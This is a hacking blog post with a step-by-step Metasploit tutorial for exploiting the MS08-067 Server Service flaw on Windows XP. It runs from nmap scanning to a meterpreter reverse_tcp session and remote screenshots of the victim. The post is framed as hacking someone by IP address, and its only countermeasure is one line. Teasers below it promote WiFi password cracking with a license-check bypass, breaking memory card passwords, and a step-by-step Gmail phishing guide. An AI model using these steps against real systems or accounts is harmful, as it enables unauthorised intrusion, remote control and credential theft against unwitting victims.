Skip to main content

[Metasploit Tutorial] Hacking Windows XP using IP Address

[Metasploit Tutorial] Hacking Windows XP using IP Address

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don’t believe me, then read the full article.
Ethical Hacking Certifications
In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.
Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.
A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
Exploiting the MS08-067 using Metasploit:
Requirements:
  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:
Create Two Virtual Machine(VM) namely “Target” and “BT5″.  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.
If you don’t know how to create virtual machines , then please read this VirtualBox Manual.
Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.
Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.
Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.
Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.
Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.
The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Let us use the Search command to find the exploit modules with the keyword netapi. Type “search netapi”.  Now you can see the list of modules match with the netapi.
We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.
Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.
Step 6: Options
Type “set LHOST 192.168.56.10“.  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing ‘ifconfig’ command in the Terminal.
Type “set RHOST 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine.
Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can see the following result.
Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.
CounterMeasures:
Update your OS frequently.

Comments

Popular posts from this blog

Hack WiFi password (rooted or non-rooted device)

Hello guyzz!!! Today I am here to share a trick how to hack WiFi password in an android mobile.It works on rooted as well as non-rooted device depending upon you device capability.. How to install: Method One: in order to skip license verification first you must be disconnected from internet when you run this app , it will automaticly connects you or turns your wifi on Method Two: or use lucky patcher for preventing it from license verification check these options in lucky patcher auto mode, other patches, apply patch to delvick cache, back up apk file for reinstaller This app has NO advertisements Instructions: This app has NO advertisements CONTACT ME BEFORE GIVING BAD REVIEW, SO I CAN HELP YOU. The application supports two types of test: - Dictionary test - it tries passwords from predefined list one by one. Please don't be disappointed if the password willnot be found, it simply means that it was not in the dictionary. However, if somebody set his key to ...

Hack a memory card password within minutes

possible ways to break micro sd memory card password hye friends today's topic is very importent .some time we secrate the data in memory card with password but unfortunatly we forget that password which protect our dta from hackers or your friends or any other you guess. so i am here to give you best solution of breaking memory card paasword in only 5 minutes. there are lot off methode publish on internate about how to break the memory card password but many of my reader advise me to write a tutorial about breaking memory card password .becuase they believe that i am write that tutorial very friendly so they can understand very ifficiently. so now i am going to start the tutorial namly how to break memory card password.here i am publish very friendly methode break password so i give only those methode which easily understandable for everyone .so dont wasting your valuable time lets start.follow step by step procedure. solution no. 1:-- BREAKING MEMORY CARD PASSWORD FOR...

Hack gmail password

Phishing method  Phishing is an old method of e-mail fraud that is used to gather personal and financial information from the recipients. phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.Phishing is an example of a social engineering technique. ***Step by step guide to hack Gmail account using phishing *** step:1.)  first of all Go to the Gmail.com step:2)   and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )                                           step:3)  now a pop up window  will be open w...